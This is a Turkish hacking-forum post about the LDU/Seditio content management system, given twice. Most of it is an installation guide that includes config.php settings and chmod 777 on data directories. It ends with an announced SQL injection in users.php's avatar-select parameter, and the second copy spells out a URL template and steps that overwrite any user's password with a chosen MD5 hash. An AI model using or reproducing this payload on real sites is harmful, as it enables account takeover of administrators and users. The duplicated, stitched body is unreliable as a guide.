- 8 Ocak 2017
- 419
- 7
Selamun Aleyküm
THT Ailesi
Ldu ve Seditio Hack Açıklar Açıkları Acıkları Acıklar Injection
LDU KURULUMU
1 : INDIRME >> En son LDU paketini indiriniz.
Son paketi SADECE neocrome.net adresinden indiriniz.
Baska bir siteden indirilmesi yasadisidir ve güvensizdir.
2 : AYARLAR >> Ayar dosyasini düzenleyiniz.
datas/config.php dosyasini açiniz ve e-posta site basligi ve benzeri parametreleri isteginiz dogrultusunda düzenleyiniz. Bununla birlikte MySQL ayarlarini veritabani bilgilerinize göre ekleyiniz. Anlamadiginiz bir ayari degistirmeyiniz .
3 : SUNUCUYA AKTARMA >> Dosyalari sunucuya aktariniz.
Tüm deri klasörlerini aktarmaniz gerekmiyor. Sistemin çalismasi için birinin aktarilmasi yeterli.
Geçerli deri klasörü /datas/config.php içinde olacaktir. ilk çagrilan deri bu olacagi için aktardiginiz tek dizinin bu oldugundan emin olmalisiniz veya aktardiginiz dizinin ismine göre ikinci adima geri dönmelisiniz.
docs/ dizinini aktarmaniza gerek yoktur. Burada LDU sistemini kullanan sizler için bilgiler yer alir.
4 : CHMOD AYARLARI >> Sunucunuz için yazma okuma ayarlarini belirleyiniz.
dizinlerine CHMOD 777 uygulayiniz:
CHMOD-bir dizini 777 yapmak o dizine yazma okuma erisim haklarini tamamen açmaktir. FTP yaziliminizda bir komut satiri veya CHMOD seçeneginin bulundugu bir arabirim ile ayar yaparsiniz. (Bu genelde sag tik oluyor).
5 : MySQL VERITABANINI OLUSTURMAK >> MySQL Veritabanini olusturunuz.
MySQLe uzaktan baglanti araciniza baglaniniz. (Genelde PHPmyAdmin).
Veritabaninizi seçin, "SQL" baglantisina tiklayin, ardindan Gözata tiklayip docs/ldu-createnew-700.sql dosyasini seçin ve uygulatin, bu gerekli tablolari olusturacaktir.
6 : ILK ÇALISTIRMA >> Kendinize bir yönetici hesabi olusturun.
Ana sayfa baglantinizi bir tarayici yardimiyla açin ve önce baglan ardindan kayit ol baglantilarini kullanarak kendinize bir hesap olusturun.
7 : ServerOp HESABI
Sisteme ilk kayit olan kullanici otomatik olarak 99 (ServerOp) olarak atanir ve hesap aktiflestirilir. Eger üye onayi için aktiflestirme mesajlarini almiyorsaniz sunucunuz e-posta göndermek için düzgün yapilandirilmamis demektir. Bu durumda manuel olarak users tablosundan user_active sekmesini 1 yaparak kullaniciyi aktiflestirebilirsiniz. Eger bir akilli çikip tam siz islem yaparken arada kayit olmayi basarirsa users tablosunu tamamen silip yeniden kayit olmayi deneyin.
8 : Gelismis Eklentilerin Yüklenmesi
Baglanti tamamlandiktan sonra Gelismis Eklentiler baglantisini tiklayiniz, ardindan tercihlerinize göre ister tek tek ister tümünü yükle seçenekleri ile eklenti yükleme islemlerini tamamlayiniz.
9 : Son
Kurulum islemi simdi basariyla tamamlanmis olmali.
Not: Eger basaramadiysaniz derin bir nefes alin ve en basa dönüp adimlari dikkatlice yeniden uygulayin. Tekrar çalismazsa LDU Türkçe forumuna gelip karsilastiginiz sorunu arayin. Muhtemelen çogu durumla daha önceden karsilasilmistir bu yüzden öncelikle aramaya inanin ve arayin.
Problemin daha önce islenmedigine emin oldugunuzda sorununuzu anlatan bir baslik ve çalistiginiz sistemle ilgili bilgiler içeren bir mesaj ile probleminizi LDU Türkçe forumuna yaziniz. Mutlaka web sitenizi sol kisima yaziniz bu sitenizi inceleyen yardimcilarin problemi dogrudan görmesine olanak saglayacaktir.
Kurulum Ek Sorun Çözümleri
Durum: Türkçe karakterler düzgün görüntülenmiyor.
Çözüm: Yönetim Merkezi / Ayarlar / Seçenekler - HTML karakter setini Turkish-ISO-8859-9 olarak belirleyin.
Durum: Ek TXT veya HTML belgeleri sistemden görüntületmek.
Çözüm: datasview dizinine dosyanin atilmasi yeterlidir. ean.htm in atilmasi durumunda çikis adresi view.php?v=ean olacaktir.
Durum: PHP kodu eklemek / çalistirmak istiyorum.
Çözüm: LDU Türkçe Forumundan LDU ip Uçlari sabit konusu altinda plug-in çalistirmayi okuyunuz.
Durum: Flood korumalarini aktiflestirmek istiyorum.
Çözüm: LDU gelismis koruma araçlarina sahiptir. Yönetim Merkezi / Ayarlar / Site Korumasi bölümünden LDU Shieldi devreye almaniz güvenlik sorunlariniza yeterli bir çözüm olacaktir. Bu sitede de zaman zaman karsilastiginiz gibi etrafta lamerlar yani karin agrisindan baska ise yaramayan insanlar fazlasiyla mevcut. Bunun için en etkili yöntemlerden biri de siteye kullanici aliminda yönetici aktivasyonunu devreye almaktir. Saldirilarin bir kaç saniye içinde bertaraf edilmesi bu sekilde mümkün olmaktadir. 8 saat ugrasan lamercik sizin bir tiklamaniza yenilmis olur.
LDU içerik yönetim sistemi ile esenlikle dolu yarinlar ve fikirleriniz hür bir sekilde insanlara duyurabileceginiz web siteleri olusturmanizi umuyoruz.
Ldu Injection acigi tespit edildi ! ! !
--------------------------------
-------------------------
-------------------
------------
---------
Allah'a emanet olunuz.
Rolls
THT Ailesi
----------------------------------------
Ldu ve Seditio Hack Açıklar Açıkları Acıkları Acıklar Injection
LDU KURULUMU
1 : INDIRME >> En son LDU paketini indiriniz.
Son paketi SADECE neocrome.net adresinden indiriniz.
Baska bir siteden indirilmesi yasadisidir ve güvensizdir.
2 : AYARLAR >> Ayar dosyasini düzenleyiniz.
datas/config.php dosyasini açiniz ve e-posta site basligi ve benzeri parametreleri isteginiz dogrultusunda düzenleyiniz. Bununla birlikte MySQL ayarlarini veritabani bilgilerinize göre ekleyiniz. Anlamadiginiz bir ayari degistirmeyiniz .
Kod:
[CENTER]$cfg[mysqlhost] = localhost; // Veritabani Sunucu Baglantisi
$cfg[mysqluser] = root; // Veritabani Kullanici Adi
$cfg[mysqlpassword] = ; // Veritabano Parolasi
$cfg[mysqldb] = test; // Veritabani Adi
$cfg[adminemail] = [email protected]; // Yönetici e-posta adresi
$cfg[maintitle] = MainTitleHere; // Ana site basligi
$cfg[subtitle] = SubtitleHere; // Seçenege bagli alt baslik
$cfg[mainurl] = http://www.mydomain.com; // Sonunda slash olmayacak !
$cfg[defaultskin] = cranberry; // Geçerli Deri
$cfg[defaultlang] = tr; // Geçerli Dil[/CENTER]3 : SUNUCUYA AKTARMA >> Dosyalari sunucuya aktariniz.
Tüm deri klasörlerini aktarmaniz gerekmiyor. Sistemin çalismasi için birinin aktarilmasi yeterli.
Geçerli deri klasörü /datas/config.php içinde olacaktir. ilk çagrilan deri bu olacagi için aktardiginiz tek dizinin bu oldugundan emin olmalisiniz veya aktardiginiz dizinin ismine göre ikinci adima geri dönmelisiniz.
docs/ dizinini aktarmaniza gerek yoktur. Burada LDU sistemini kullanan sizler için bilgiler yer alir.
4 : CHMOD AYARLARI >> Sunucunuz için yazma okuma ayarlarini belirleyiniz.
Kod:
[CENTER]datas/avatars/
datas/thumbs/
datas/tmp/
datas/users/[/CENTER]CHMOD-bir dizini 777 yapmak o dizine yazma okuma erisim haklarini tamamen açmaktir. FTP yaziliminizda bir komut satiri veya CHMOD seçeneginin bulundugu bir arabirim ile ayar yaparsiniz. (Bu genelde sag tik oluyor).
5 : MySQL VERITABANINI OLUSTURMAK >> MySQL Veritabanini olusturunuz.
MySQLe uzaktan baglanti araciniza baglaniniz. (Genelde PHPmyAdmin).
Veritabaninizi seçin, "SQL" baglantisina tiklayin, ardindan Gözata tiklayip docs/ldu-createnew-700.sql dosyasini seçin ve uygulatin, bu gerekli tablolari olusturacaktir.
6 : ILK ÇALISTIRMA >> Kendinize bir yönetici hesabi olusturun.
Ana sayfa baglantinizi bir tarayici yardimiyla açin ve önce baglan ardindan kayit ol baglantilarini kullanarak kendinize bir hesap olusturun.
7 : ServerOp HESABI
Sisteme ilk kayit olan kullanici otomatik olarak 99 (ServerOp) olarak atanir ve hesap aktiflestirilir. Eger üye onayi için aktiflestirme mesajlarini almiyorsaniz sunucunuz e-posta göndermek için düzgün yapilandirilmamis demektir. Bu durumda manuel olarak users tablosundan user_active sekmesini 1 yaparak kullaniciyi aktiflestirebilirsiniz. Eger bir akilli çikip tam siz islem yaparken arada kayit olmayi basarirsa users tablosunu tamamen silip yeniden kayit olmayi deneyin.
8 : Gelismis Eklentilerin Yüklenmesi
Baglanti tamamlandiktan sonra Gelismis Eklentiler baglantisini tiklayiniz, ardindan tercihlerinize göre ister tek tek ister tümünü yükle seçenekleri ile eklenti yükleme islemlerini tamamlayiniz.
9 : Son
Kurulum islemi simdi basariyla tamamlanmis olmali.
Not: Eger basaramadiysaniz derin bir nefes alin ve en basa dönüp adimlari dikkatlice yeniden uygulayin. Tekrar çalismazsa LDU Türkçe forumuna gelip karsilastiginiz sorunu arayin. Muhtemelen çogu durumla daha önceden karsilasilmistir bu yüzden öncelikle aramaya inanin ve arayin.
Problemin daha önce islenmedigine emin oldugunuzda sorununuzu anlatan bir baslik ve çalistiginiz sistemle ilgili bilgiler içeren bir mesaj ile probleminizi LDU Türkçe forumuna yaziniz. Mutlaka web sitenizi sol kisima yaziniz bu sitenizi inceleyen yardimcilarin problemi dogrudan görmesine olanak saglayacaktir.
Kurulum Ek Sorun Çözümleri
Durum: Türkçe karakterler düzgün görüntülenmiyor.
Çözüm: Yönetim Merkezi / Ayarlar / Seçenekler - HTML karakter setini Turkish-ISO-8859-9 olarak belirleyin.
Durum: Ek TXT veya HTML belgeleri sistemden görüntületmek.
Çözüm: datasview dizinine dosyanin atilmasi yeterlidir. ean.htm in atilmasi durumunda çikis adresi view.php?v=ean olacaktir.
Durum: PHP kodu eklemek / çalistirmak istiyorum.
Çözüm: LDU Türkçe Forumundan LDU ip Uçlari sabit konusu altinda plug-in çalistirmayi okuyunuz.
Durum: Flood korumalarini aktiflestirmek istiyorum.
Çözüm: LDU gelismis koruma araçlarina sahiptir. Yönetim Merkezi / Ayarlar / Site Korumasi bölümünden LDU Shieldi devreye almaniz güvenlik sorunlariniza yeterli bir çözüm olacaktir. Bu sitede de zaman zaman karsilastiginiz gibi etrafta lamerlar yani karin agrisindan baska ise yaramayan insanlar fazlasiyla mevcut. Bunun için en etkili yöntemlerden biri de siteye kullanici aliminda yönetici aktivasyonunu devreye almaktir. Saldirilarin bir kaç saniye içinde bertaraf edilmesi bu sekilde mümkün olmaktadir. 8 saat ugrasan lamercik sizin bir tiklamaniza yenilmis olur.
LDU içerik yönetim sistemi ile esenlikle dolu yarinlar ve fikirleriniz hür bir sekilde insanlara duyurabileceginiz web siteleri olusturmanizi umuyoruz.
Ldu Injection acigi tespit edildi ! ! !
Kod:
[CENTER]users.php?m=profil&a=avatarselect&x=011A99&id=[avatarid]-avatar.gif%[user sql taplo baslangici ]%[user id ],user_password=%[Yapmak istediginiz sifrenin md5]
avatar id e seçtigimiz avatari yaziorz..
User sql baslangicina ilk üyenin idi (genelde 1 dir)
user id e sifresinji deistirmek istedigimiz kisinin idini en sonada yapmak istedigimiz sifreyi md5 olarak giriyoruz[/CENTER]--------------------------------
-------------------------
-------------------
------------
---------
Allah'a emanet olunuz.
Rolls
